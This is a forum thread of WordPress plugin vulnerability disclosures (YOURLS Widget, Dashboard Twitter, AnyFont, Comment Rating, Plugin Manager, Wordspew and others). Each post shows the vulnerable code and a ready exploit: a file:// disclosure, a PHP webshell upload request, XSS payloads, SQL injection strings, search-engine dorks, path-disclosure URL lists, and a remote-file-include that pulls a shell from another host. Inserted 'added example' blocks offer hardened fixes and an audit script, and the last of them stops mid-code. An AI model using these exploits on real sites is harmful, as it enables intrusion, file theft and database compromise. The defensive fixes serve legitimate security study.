#21 | RulleR | 08.09.2010, 17:07
WordPress Plugin [YOURLS Widget] File Disclosure Vulnerability

Plugin name: YOURLS Widget (download)
Version: 0.3

File Disclosure

Vuln file: /wp-content/plugins/yourls-widget/yourls-widget-hook.php
PHP code:
/*...*/
$api_url = $_REQUEST['api_url'];

// Init the CURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $api_url);
curl_setopt($ch, CURLOPT_HEADER, 0);            // No header in the result
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Return, do not echo result
curl_setopt($ch, CURLOPT_POST, 1);              // This is a POST request
/*...*/
$data = curl_exec($ch);
curl_close($ch);

// Do something with the result. Here, we just echo it.
echo <<<SHOWTIME
    <a href='$data'>$data</a>
SHOWTIME;
/*...*/
Exploit:
Code:
http://[host]/[path]/wp-content/plugins/yourls-widget/yourls-widget-hook.php?api_url=file:///etc/hosts
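Added example, not code from the YOURLS Widget plugin: a hardened replacement for the hook shown in the post. The root cause is that the API endpoint is taken from `$_REQUEST` and handed to cURL unchanged, so any scheme cURL supports (`file://` in the PoC, but also `gopher://`, `dict://`, internal `http://` hosts) is reachable, and the response body is then echoed raw into the page. The version below reads the endpoint from plugin settings, validates it, pins cURL to http/https at the transport level, and escapes on output. The option name `yourls_widget_api_url` and the POST field `url` are assumptions made for this example; the API parameters `action=shorturl` and `format=simple` are the documented YOURLS ones.

```php
<?php
// Added example (not YOURLS Widget code). Assumptions: the endpoint is stored
// in the option 'yourls_widget_api_url' and the long URL arrives as POST 'url'.

function yw_fetch_short_url($api_url, $long_url) {
    // 1. Validate the configured endpoint: absolute, http(s), with a host.
    $parts = parse_url($api_url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])
        || !in_array(strtolower($parts['scheme']), array('http', 'https'), true)) {
        return new WP_Error('yw_bad_url', 'API URL must be an absolute http(s) URL.');
    }

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $api_url);
    // 2. Pin the allowed schemes at the transport layer as well, for the first
    //    request and for any redirect, so file://, gopher://, dict:// and the
    //    rest are refused even if the check above is ever bypassed.
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
        'action' => 'shorturl',
        'format' => 'simple',
        'url'    => $long_url,
    )));
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);

    $data = curl_exec($ch);
    $err  = curl_error($ch);
    curl_close($ch);

    if ($data === false) {
        return new WP_Error('yw_curl', 'Request failed: ' . $err);
    }
    // 3. The body is untrusted: accept only something that parses as an
    //    http(s) URL, never arbitrary text.
    $data = trim($data);
    if (!preg_match('#^https?://#i', $data) || filter_var($data, FILTER_VALIDATE_URL) === false) {
        return new WP_Error('yw_bad_response', 'Unexpected response from the YOURLS API.');
    }
    return $data;
}

// Hook side. The endpoint comes from stored settings, never from the request.
$api_url  = get_option('yourls_widget_api_url');            // assumed option name
$long_url = isset($_POST['url']) ? (string) $_POST['url'] : '';
$short    = yw_fetch_short_url($api_url, $long_url);

if (is_wp_error($short)) {
    wp_die(esc_html($short->get_error_message()));
}
// 4. Escape on output; the original dropped the body straight into an <a>.
printf("<a href='%s'>%s</a>", esc_url($short), esc_html($short));
```

Inside WordPress the shorter route is `wp_remote_post()`, which only speaks http/https and (in current versions) runs the target through `wp_http_validate_url()`; the point of spelling it out with cURL here is to show which cURL options do the scheme pinning when raw cURL is used.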
#22 | RulleR | 10.10.2010, 19:45
WordPress Plugin [WordPress Dashboard Twitter] Arbitrary File Upload Vulnerability

Plugin name: WordPress Dashboard Twitter (download)
Version: 1.0.2

Arbitrary File Upload

Vuln file: /wp-content/plugins/wordpress-dashboard-twitter/inc/upload.func.php
PHP code:
<?php
switch( $_GET['action'] ) {
    case 'upload-image':
        require_once( '../../../../wp-load.php' );
        $uploaddir  = str_replace('inc/', '', dirname( __FILE__ ) . '/uploads/' );
        $uploadfile = $uploaddir . wp_unique_filename($uploaddir, $_FILES['userfile']['name']);

        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
            echo "Uploaded.";
        } else {}
        break;
}
?>
Exploit:
Code:
POST http://[host]/[path]/wp-content/plugins/wordpress-dashboard-twitter/inc/upload.func.php?action=upload-image HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8343976828233

-----------------------------8343976828233
Content-Disposition: form-data; name="userfile"; filename="thumb.php"
Content-Type: application/vcard

<?php
echo 'test';
?>
-----------------------------8343976828233--

http://[host]/[path]/wp-content/plugins/wordpress-dashboard-twitter/uploads/thumb.php
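Added example, not code from the WordPress Dashboard Twitter plugin: a hardened form of the `upload-image` action above. The original handler has no authentication, no CSRF token and no file-type restriction, and it stores the file under a web-reachable plugin directory, so any visitor can drop a `.php` file and execute it. The version below requires a logged-in user with `upload_files`, checks a nonce, and routes the file through `wp_handle_upload()` with an explicit image MIME whitelist (which also sniffs the content, not just the extension). The nonce action `wdt_upload_image`, the nonce field `_wdt_nonce` and the capability choice are assumptions for this example; `userfile` is the field name from the post.

```php
<?php
// Added example (not WordPress Dashboard Twitter code). Assumed names:
// nonce action 'wdt_upload_image', nonce field '_wdt_nonce'.
require_once('../../../../wp-load.php');
require_once(ABSPATH . 'wp-admin/includes/file.php'); // wp_handle_upload()

function wdt_handle_image_upload() {
    // 1. AuthN/AuthZ: the original accepted uploads from anyone.
    if (!is_user_logged_in() || !current_user_can('upload_files')) {
        wp_die('Forbidden', '', array('response' => 403));
    }
    // 2. CSRF: the form must carry a nonce bound to this action. On failure
    //    check_admin_referer() dies with a 403 before anything is written.
    check_admin_referer('wdt_upload_image', '_wdt_nonce');

    if (empty($_FILES['userfile']['tmp_name']) || !is_uploaded_file($_FILES['userfile']['tmp_name'])) {
        wp_die('No file uploaded', '', array('response' => 400));
    }

    // 3. Restrict to image types. wp_handle_upload() verifies extension and
    //    content together (wp_check_filetype_and_ext) against this list.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );
    $result = wp_handle_upload($_FILES['userfile'], array(
        'test_form' => false,
        'mimes'     => $allowed,
    ));
    if (isset($result['error'])) {
        wp_die(esc_html($result['error']), '', array('response' => 400));
    }

    // 4. Belt and braces: refuse anything whose final name still carries a
    //    PHP-executable extension, and confirm the stored bytes decode as an
    //    image. Either failure removes the file again.
    $ext = strtolower(pathinfo($result['file'], PATHINFO_EXTENSION));
    if (preg_match('/^ph(?:p\d?|tml|ar)$/', $ext) || @getimagesize($result['file']) === false) {
        unlink($result['file']);
        wp_die('Rejected', '', array('response' => 400));
    }
    return $result['url'];
}

if (isset($_GET['action']) && $_GET['action'] === 'upload-image') {
    $url = wdt_handle_image_upload();
    echo 'Uploaded: ' . esc_url($url);
}
```

Note that `wp_handle_upload()` writes into the WordPress uploads directory rather than the plugin's own `uploads/` folder; if a plugin must keep its own directory, that directory should additionally be configured so the web server never executes PHP from it (an Apache `php_flag engine off` / `FilesMatch` deny rule, or an nginx `location` that returns 403 for `\.php$` under it).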
#23 | Svet | 13.10.2010, 12:28

WP 3.0.1 FPD

Code:
http://[host]/[path_to_wordpress]/wp-admin/menu-header.php
http://[host]/[path_to_wordpress]/wp-admin/includes/comment.php
http://[host]/[path_to_wordpress]/wp-admin/includes/template.php
http://[host]/[path_to_wordpress]/wp-admin/includes/file.php
http://[host]/[path_to_wordpress]/wp-admin/includes/misc.php
http://[host]/[path_to_wordpress]/wp-admin/includes/update.php
http://[host]/[path_to_wordpress]/wp-admin/includes/class-wp-filesystem-ssh2.php
http://[host]/[path_to_wordpress]/wp-admin/includes/plugin-install.php
http://[host]/[path_to_wordpress]/wp-admin/includes/admin.php
http://[host]/[path_to_wordpress]/wp-admin/includes/continents-cities.php
http://[host]/[path_to_wordpress]/wp-admin/includes/class-ftp-pure.php
http://[host]/[path_to_wordpress]/wp-admin/includes/plugin.php
http://[host]/[path_to_wordpress]/wp-admin/includes/nav-menu.php
http://[host]/[path_to_wordpress]/wp-admin/includes/ms.php
http://[host]/[path_to_wordpress]/wp-admin/includes/upgrade.php
http://[host]/[path_to_wordpress]/wp-admin/includes/class-wp-filesystem-ftpext.php
http://[host]/[path_to_wordpress]/wp-admin/includes/user.php
http://[host]/[path_to_wordpress]/wp-admin/includes/class-wp-filesystem-ftpsockets.php
http://[host]/[path_to_wordpress]/wp-admin/includes/media.php
http://[host]/[path_to_wordpress]/wp-admin/includes/class-wp-filesystem-direct.php
http://[host]/[path_to_wordpress]/wp-admin/includes/class-ftp-sockets.php
http://[host]/[path_to_wordpress]/wp-admin/includes/theme-install.php
http://[host]/[path_to_wordpress]/wp-admin/admin-functions.php
http://[host]/[path_to_wordpress]/wp-admin/options-head.php
http://[host]/[path_to_wordpress]/wp-admin/menu.php
http://[host]/[path_to_wordpress]/wp-admin/upgrade-functions.php
http://[host]/[path_to_wordpress]/wp-content/plugins/akismet/akismet.php
http://[host]/[path_to_wordpress]/wp-content/plugins/hello.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/comments.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/404.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/category.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/tag.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/attachment.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/index.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/header.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/single.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/search.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/archive.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/footer.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/sidebar-footer.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/page.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/sidebar.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/loop.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/functions.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/onecolumn-page.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/author.php
http://[host]/[path_to_wordpress]/wp-includes/feed-rss2.php
http://[host]/[path_to_wordpress]/wp-includes/class.wp-styles.php
http://[host]/[path_to_wordpress]/wp-includes/rss.php
http://[host]/[path_to_wordpress]/wp-includes/feed-rdf.php
http://[host]/[path_to_wordpress]/wp-includes/feed-atom.php
http://[host]/[path_to_wordpress]/wp-includes/general-template.php
http://[host]/[path_to_wordpress]/wp-includes/wp-db.php
http://[host]/[path_to_wordpress]/wp-includes/taxonomy.php
http://[host]/[path_to_wordpress]/wp-includes/feed-rss.php
http://[host]/[path_to_wordpress]/wp-includes/default-widgets.php
http://[host]/[path_to_wordpress]/wp-includes/class-snoopy.php
http://[host]/[path_to_wordpress]/wp-includes/default-filters.php
http://[host]/[path_to_wordpress]/wp-includes/ms-default-constants.php
http://[host]/[path_to_wordpress]/wp-includes/canonical.php
http://[host]/[path_to_wordpress]/wp-includes/comment-template.php
http://[host]/[path_to_wordpress]/wp-includes/update.php
http://[host]/[path_to_wordpress]/wp-includes/template-loader.php
http://[host]/[path_to_wordpress]/wp-includes/theme-compat/comments.php
http://[host]/[path_to_wordpress]/wp-includes/theme-compat/header.php
http://[host]/[path_to_wordpress]/wp-includes/theme-compat/comments-popup.php
http://[host]/[path_to_wordpress]/wp-includes/theme-compat/footer.php
http://[host]/[path_to_wordpress]/wp-includes/theme-compat/sidebar.php
http://[host]/[path_to_wordpress]/wp-includes/vars.php
http://[host]/[path_to_wordpress]/wp-includes/post.php
http://[host]/[path_to_wordpress]/wp-includes/ms-settings.php
http://[host]/[path_to_wordpress]/wp-includes/theme.php
http://[host]/[path_to_wordpress]/wp-includes/feed-atom-comments.php
http://[host]/[path_to_wordpress]/wp-includes/ms-default-filters.php
http://[host]/[path_to_wordpress]/wp-includes/ms-functions.php
http://[host]/[path_to_wordpress]/wp-includes/registration-functions.php
http://[host]/[path_to_wordpress]/wp-includes/shortcodes.php
http://[host]/[path_to_wordpress]/wp-includes/class.wp-scripts.php
http://[host]/[path_to_wordpress]/wp-includes/class-feed.php
http://[host]/[path_to_wordpress]/wp-includes/script-loader.php
http://[host]/[path_to_wordpress]/wp-includes/default-embeds.php
http://[host]/[path_to_wordpress]/wp-includes/nav-menu-template.php
http://[host]/[path_to_wordpress]/wp-includes/user.php
http://[host]/[path_to_wordpress]/wp-includes/rss-functions.php
http://[host]/[path_to_wordpress]/wp-includes/media.php
http://[host]/[path_to_wordpress]/wp-includes/feed-rss2-comments.php
http://[host]/[path_to_wordpress]/wp-includes/js/tinymce/langs/wp-langs.php
http://[host]/[path_to_wordpress]/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
http://[host]/[path_to_wordpress]/wp-includes/js/tinymce/plugins/spellchecker/classes/GoogleSpell.php
http://[host]/[path_to_wordpress]/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpell.php
http://[host]/[path_to_wordpress]/wp-includes/js/tinymce/plugins/spellchecker/classes/EnchantSpell.php
http://[host]/[path_to_wordpress]/wp-includes/kses.php
http://[host]/[path_to_wordpress]/wp-settings.php
#24 | Svet | 22.10.2010, 20:15

WP Security Scan 2.7.1.2
http://wordpress.org/extend/plugins/wp-security-scan/

FPD:
Code:
http://[host]/[path_to_wordpress]wp-content/plugins/wp-security-scan/securityscan.php
===========================================================================

StatPress 1.4.1
http://wordpress.org/extend/plugins/statpress/

FPD:
Code:
http://[host]/[path_to_wordpress]wp-content/plugins/statpress/statpress.php
===========================================================================

Dynamic Headers 3.5.3
http://wordpress.org/extend/plugins/dynamic-headers/

FPD:
Code:
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/admin/header.php
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/admin/main.php
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/admin/manage.php
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/admin/options.php
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/admin/directions.php
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/admin/about.php
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/custom-header.php
===========================================================================

WP Super Edit 2.3.3
http://wordpress.org/extend/plugins/wp-super-edit/

FPD:
Code:
http://[host]/[path_to_wordpress]wp-content/plugins/wp-super-edit/wp-se-emotions.php
http://[host]/[path_to_wordpress]wp-content/plugins/wp-super-edit/wp-super-edit-user.php
http://[host]/[path_to_wordpress]wp-content/plugins/wp-super-edit/wp-super-edit-defaults.php
http://[host]/[path_to_wordpress]wp-content/plugins/wp-super-edit/wp-se-cssclasses.php
===========================================================================

WP Wall 1.7
http://wordpress.org/extend/plugins/wp-wall/

FPD:
Code:
http://[host]/[path_to_wordpress]wp-content/plugins/wp-wall/recent-comments-widget.php
XSS:
Code:
Depends on: "Allow HTML in comments (use with CAUTION)" being enabled
Location: comment field
Ex: <script>alert("XSS o_O");</script>
#25 | }{оттабыч | 22.10.2010, 21:57
AnyFont

AnyFont
[download]

pXSS

/wp-content/plugins/anyfont/mce_anyfont/dialog.php
Code:
/*...*/
 <br /><br />
        <label for="text">Text to insert:</label>
        <input type="text" name="text" id="text" class="mceFocus mceRequired" value="<?php echo stripslashes($_REQUEST['text']); ?>">
        </fieldset>
/*...*/
PoC
Code:
http://[host]/[path]/wp-content/plugins/anyfont/mce_anyfont/dialog.php?style=admin&text=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E&insert=Insert+Text

FPD

PoC
Code:
http://[host]/[path]/wp-content/plugins/anyfont/anyfont.php
#26 | }{оттабыч | 22.10.2010, 22:48

All in One SEO Pack

Dork -> inurl:/wp-content/plugins/all-in-one-seo-pack/

FPD

PoC
Code:
http://[host]/[path]/wp-content/plugins/all-in-one-seo-pack/all_in_one_seo_pack.php

Contact Form 7

Dork -> inurl:/wp-content/plugins/contact-form-7/

FPD

PoC
Code:
http://[host]/[path]/wp-content/plugins/contact-form-7/wp-contact-form-7.php
#27 | }{оттабыч | 14.12.2010, 16:10

Ultimate Blogroll 1.6.2
download

Last Updated: 2010-12-12

/wp-content/plugins/ultimate-blogroll/gui/ImportExport.php
PHP code:
global $gui, $path;
require_once($path."gui/header.php");
require_once($path."gui/functions.php");
/*...*/
RFI
Requires register_globals = On

Code:
http://[host]/[path]/wp-content/plugins/ultimate-blogroll/gui/ImportExport.php?path=http://[host]/[path]/shellname.txt?
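Added example, not code from any of the plugins in this thread: a small static audit, written for the FPD lists in posts #23 to #26, the reflected XSS in AnyFont's `dialog.php`, and the variable-path `require_once` in Ultimate Blogroll's `ImportExport.php` above. All three have the same shape: a file under `wp-content` that is meant to be included by WordPress but can be requested directly, and either dies with a fatal error that prints its own path (no `ABSPATH` guard), includes from a variable that `register_globals` lets the request set, or echoes a superglobal unescaped. The script walks a directory, applies one heuristic regex per pattern, and reports file, line and type. The sample plugin tree it scans is constructed inline for the demonstration and is not a real plugin; the regexes are leads, not proof.

```php
<?php
// Added example. Heuristic static audit for the three patterns discussed in
// the thread: missing ABSPATH guard (FPD), variable include path (RFI/LFI),
// superglobal echoed without escaping (XSS). Not a replacement for review.

function wp_audit_file($file) {
    $src   = file_get_contents($file);
    $lines = explode("\n", $src);
    $hits  = array();

    // 1. FPD: a file that never references ABSPATH neither guards against
    //    direct access nor is a bootstrap file, so a direct hit will fatal on
    //    the first WordPress call and print its filesystem path.
    if (!preg_match('/\bABSPATH\b/', $src)) {
        $hits[] = array('line' => 1, 'type' => 'no-abspath-guard', 'code' => basename($file));
    }
    foreach ($lines as $i => $line) {
        // 2. RFI/LFI: include/require whose path contains a variable.
        if (preg_match('/\b(?:include|require)(?:_once)?\s*\(?\s*[^;]*\$\w+/', $line)) {
            $hits[] = array('line' => $i + 1, 'type' => 'variable-include', 'code' => trim($line));
        }
        // 3. XSS: echo/print of a superglobal with no escaping call on the line.
        if (preg_match('/\b(?:echo|print)\b[^;]*\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b/', $line)
            && !preg_match('/esc_\w+\(|htmlspecialchars\(|htmlentities\(|intval\(|\(int\)/', $line)) {
            $hits[] = array('line' => $i + 1, 'type' => 'unescaped-output', 'code' => trim($line));
        }
    }
    return $hits;
}

function wp_audit_dir($dir) {
    $report = array();
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $path => $info) {
        if ($info->isFile() && strtolower($info->getExtension()) === 'php') {
            $hits = wp_audit_file($path);
            if ($hits) {
                $report[$path] = $hits;
            }
        }
    }
    return $report;
}

// --- Constructed sample plugin tree (written to a temp dir; not a real plugin)
$root = sys_get_temp_dir() . '/wp-audit-' . uniqid();
mkdir("$root/gui", 0700, true);
file_put_contents("$root/gui/ImportExport.php", <<<'PHP'
<?php
global $gui, $path;
require_once($path."gui/header.php");
echo 'Text: <input value="' . stripslashes($_REQUEST['text']) . '">';
PHP
);
file_put_contents("$root/gui/safe.php", <<<'PHP'
<?php
if (!defined('ABSPATH')) { exit; }
require_once(plugin_dir_path(__FILE__) . 'functions.php');
echo '<input value="' . esc_attr($_REQUEST['text']) . '">';
PHP
);

foreach (wp_audit_dir($root) as $file => $hits) {
    foreach ($hits as $h) {
        printf("%s:%d [%s] %s\n", basename($file), $h['line'], $h['type'], $h['code']);
    }
}
```

Run it with `php audit.php` (or point `wp_audit_dir()` at a real `wp-content/plugins/<name>` directory). In the constructed tree only `ImportExport.php` is reported, once per pattern; `safe.php` shows the three corresponding fixes: an `if (!defined('ABSPATH')) exit;` guard, a path derived from `__FILE__` via `plugin_dir_path()` instead of a global, and `esc_attr()` on the echoed value.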
#28 | }{оттабыч | 14.12.2010, 16:55

Comment Rating 2.9.21
Last Updated: 2010-12-6
download

SQL injection (error based) + FPD
No dependencies.

wp-content/plugins/comment-rating/ck-processkarma.php
PHP code:
/*...*/
require_once('../../../wp-config.php');
require_once('../../../wp-includes/functions.php');

// CSRF attack protection. Check the Referal field to be the same
// domain of the script

$k_id       = strip_tags($wpdb->escape($_GET['id']));
$k_action   = strip_tags($wpdb->escape($_GET['action']));
$k_path     = strip_tags($wpdb->escape($_GET['path']));
$k_imgIndex = strip_tags($wpdb->escape($_GET['imgIndex']));

$table_name         = $wpdb->prefix . 'comment_rating';
$comment_table_name = $wpdb->prefix . 'comments';

if($k_id && $k_action && $k_path) {
    //Check to see if the comment id exists and grab the rating
    $query  = "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";
    $result = mysql_query($query);

    if(!$result) { die('error|mysql: '.mysql_error()); }
/*...*/
PoC:
Code:
http://[host]/[path]/wp-content/plugins/comment-rating/ck-processkarma.php?action=1&path=1&id=9 or (1,1)=(select count(0),concat(version(),floor(rand(0)*2))from(select 1 union select 2 union select 3)x group by 2
#29 | v1d0q | 14.12.2010, 19:15

Pierre's Wordspew

Vulnerability: SQLi (blind)

Dependencies: none

Source => usersonline.php

PHP code:
function jal_get_IP() {
    if (empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
        $ip_address = $_SERVER["REMOTE_ADDR"];
    } else {
        $ip_address = $_SERVER["HTTP_X_FORWARDED_FOR"];
    }
    if(strpos($ip_address, ',') !== false) {
        $ip_address = explode(',', $ip_address);
        $ip_address = $ip_address[0];
    }
    return $ip_address;
}

// Used in UPDATE and INSERT queries, for example:

$sql = "UPDATE $tableuseronline SET timestamp = '$timestamp', ip = '".jal_get_IP()."' $where";
mysql_query($sql, $conn);

// The function itself is used in wordspew.php
Exploitation:

Code:
X_FORWARDED_FOR: 1.1.1.1' where substring((select version()) from 1 for 1)='5' and username = 'your name'#
-> no commas.

Last edited by v1d0q; 14.12.2010 at 19:20.
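Added example, not Wordspew code: a replacement for `jal_get_IP()` that fixes the two mistakes the post exposes. First, `X-Forwarded-For` is trusted from any peer, although only a reverse proxy that the site operator controls can vouch for it; anyone connecting directly can put arbitrary text in that header. Second, whatever comes back is concatenated into SQL. The function below honours the header only when `REMOTE_ADDR` is a configured proxy, walks the hop list from the right past known proxies, validates the candidate with `FILTER_VALIDATE_IP`, and falls back to the socket peer otherwise. The three request environments are constructed for the demonstration, the trusted-proxy address is an assumption, and the `$wpdb` helper at the end assumes the table and column names from the post's query.

```php
<?php
// Added example (not Wordspew code). Trusted proxy 10.0.0.2 and the
// useronline table/columns are assumptions for illustration.

function jal_get_client_ip(array $server, array $trusted_proxies) {
    $remote = isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return null; // a real socket peer always validates; null means "no request"
    }
    // Only a known reverse proxy may speak for the client. Anyone else can
    // write whatever they like into X-Forwarded-For, so ignore it from them.
    if (!in_array($remote, $trusted_proxies, true) || empty($server['HTTP_X_FORWARDED_FOR'])) {
        return $remote;
    }
    // XFF is "client, proxy1, proxy2, ...". Walk from the right, skipping our
    // own proxies; the first hop we do not own is the client as our proxy saw it.
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        if (in_array($hops[$i], $trusted_proxies, true)) {
            continue;
        }
        // Reject anything that is not an IP literal: SQL, hostnames, garbage.
        return filter_var($hops[$i], FILTER_VALIDATE_IP) !== false ? $hops[$i] : $remote;
    }
    return $remote;
}

// Even a validated address is data, not SQL: bind it. Uses WordPress's $wpdb
// (the original used mysql_query()); table and column names are assumed.
function jal_touch_user_online($wpdb, $ip, $username) {
    return $wpdb->query($wpdb->prepare(
        "UPDATE {$wpdb->prefix}useronline SET timestamp = %d, ip = %s WHERE username = %s",
        time(), $ip, $username
    ));
}

// --- Constructed request environments (not captured traffic) ----------------
$trusted = array('10.0.0.2');

// Direct connection carrying the post's payload: peer is not a proxy, so the
// header is ignored and REMOTE_ADDR is returned.
$direct = array(
    'REMOTE_ADDR'          => '203.0.113.9',
    'HTTP_X_FORWARDED_FOR' => "1.1.1.1' where substring((select version()) from 1 for 1)='5'#",
);
// Legitimate path through the proxy: the left-most untrusted hop is the client.
$viaProxy = array(
    'REMOTE_ADDR'          => '10.0.0.2',
    'HTTP_X_FORWARDED_FOR' => '198.51.100.7, 10.0.0.2',
);
// Through the proxy but with a forged, non-IP client hop: falls back to the peer.
$forged = array(
    'REMOTE_ADDR'          => '10.0.0.2',
    'HTTP_X_FORWARDED_FOR' => "1.1.1.1' or 1=1#, 10.0.0.2",
);

foreach (array('direct' => $direct, 'viaProxy' => $viaProxy, 'forged' => $forged) as $name => $env) {
    printf("%-8s -> %s\n", $name, var_export(jal_get_client_ip($env, $trusted), true));
}
```

The `#` at the end of the post's payload is what makes the original injection work: it comments out the trailing `$where`, so the attacker's own `WHERE` decides which rows get updated. With binding, the quote never closes the string and the `#` is stored as part of the (rejected) value rather than interpreted.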
#30 | }{оттабыч | 16.12.2010, 09:26

Plugin Manager 0.7.10

download

SQL injection
No dependencies.

/wp-content/plugins/plugin-manager/post.php
PHP code:
/*...*/
include('../../../wp-load.php');
include('../../../wp-admin/includes/admin.php');

$page      = $wpdb->escape($_GET['page']);
$rp        = $wpdb->escape($_GET['rp']);
$sortname  = $wpdb->escape($_GET['sortname']);
$sortorder = $wpdb->escape($_GET['sortorder']);
$query     = $wpdb->escape($_GET['query']);
$qtype     = $wpdb->escape($_GET['qtype']);

if (!$sortname)  $sortname  = 'id';
if (!$sortorder) $sortorder = 'asc';

$sort = "ORDER BY $sortname $sortorder";

if (!$page) $page = 1;
if (!$rp)   $rp   = 10;

$start = (($page-1) * $rp);

$limit = "LIMIT $start, $rp";

$where = "";
if ($query) $where = " WHERE $qtype LIKE '%$query%' ";

$sql = "SELECT * FROM " . $wpdb->prefix . "PluginManager" . $where . " $sort $limit";

$result = $wpdb->get_results($sql, ARRAY_A) or die (mysql_error());

$countsql = "SELECT COUNT(id) FROM " . $wpdb->prefix . "PluginManager";
/*...*/
PoC:
Code:
http://[host]/[path]/wp-content/plugins/plugin-manager/post.php?qtype=1%20and%200%20union%20select%20version%28%29,2,3,4,5,6,7,8,9--%20&query=1
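Added example covering both the Comment Rating post (#28) and the Plugin Manager post (#30); it is not code from either plugin. Both snippets call `$wpdb->escape()` on every input and are still injectable, because addslashes-style escaping only protects a value that sits between quotes. `WHERE ck_comment_id = $k_id`, `WHERE $qtype LIKE`, `ORDER BY $sortname $sortorder` and `LIMIT $start, $rp` are numeric, identifier, keyword and LIMIT contexts, none of them quoted, so the quote-escaping never comes into play (the PoCs accordingly contain no quotes at all). The fix is per context: bind numbers with `%d` through `$wpdb->prepare()`, map identifiers onto a fixed column list, reduce the sort keyword to `ASC`/`DESC`, clamp the LIMIT integers, and for the one genuinely quoted value run `$wpdb->esc_like()` so user-supplied `%`/`_` are literals. The column list is an assumption (the posts do not show the schema), and the `DemoDb` class at the end is a stand-in that reproduces how `wpdb::prepare()` quotes and escapes so the two functions can be run outside WordPress with the PoC inputs.

```php
<?php
// Added example (not Comment Rating or Plugin Manager code). The PluginManager
// column names are assumed; inside WordPress pass the real global $wpdb.

// Post #28: numeric context. Cast, bounds-check, then still bind with %d.
function cr_rating_query($wpdb, $raw_id) {
    $id = (int) $raw_id;
    if ($id <= 0) {
        return null;
    }
    $table = $wpdb->prefix . 'comment_rating';
    return $wpdb->prepare("SELECT * FROM `$table` WHERE ck_comment_id = %d", $id);
}

// Post #30: identifier, keyword, LIMIT and LIKE contexts, each handled on its own.
function pm_list_query($wpdb, array $get) {
    $columns   = array('id', 'name', 'description', 'status');      // assumed schema
    $sortname  = in_array($get['sortname'] ?? '', $columns, true) ? $get['sortname'] : 'id';
    $qtype     = in_array($get['qtype'] ?? '', $columns, true)    ? $get['qtype']    : null;
    $sortorder = (strtolower($get['sortorder'] ?? 'asc') === 'desc') ? 'DESC' : 'ASC';
    $page      = max(1, (int) ($get['page'] ?? 1));
    $rp        = min(100, max(1, (int) ($get['rp'] ?? 10)));
    $start     = ($page - 1) * $rp;

    $table = $wpdb->prefix . 'PluginManager';
    $sql   = "SELECT * FROM `$table`";
    $args  = array();
    if ($qtype !== null && isset($get['query']) && $get['query'] !== '') {
        // Quoted value context: bind it, and neutralise LIKE wildcards first.
        $sql   .= " WHERE `$qtype` LIKE %s";
        $args[] = '%' . $wpdb->esc_like($get['query']) . '%';
    }
    $sql   .= " ORDER BY `$sortname` $sortorder LIMIT %d, %d";
    $args[] = $start;
    $args[] = $rp;
    return $wpdb->prepare($sql, $args);
}

// Stand-in for $wpdb (demo only): mirrors the relevant behaviour of
// wpdb::prepare() (wrap %s in quotes, escape string args, cast %d via vsprintf)
// and wpdb::esc_like(). Not the real class.
class DemoDb {
    public $prefix = 'wp_';
    public function esc_like($text) {
        return addcslashes($text, '_%\\');
    }
    public function prepare($query, $args) {
        $query = preg_replace("/'%s'/", '%s', $query);        // normalise, as wpdb does
        $query = preg_replace('/(?<!%)%s/', "'%s'", $query);
        $args  = array_map(function ($a) { return is_int($a) ? $a : addslashes((string) $a); }, (array) $args);
        return vsprintf($query, $args);
    }
}

$db = new DemoDb();
// Inputs copied from the two PoCs in the thread.
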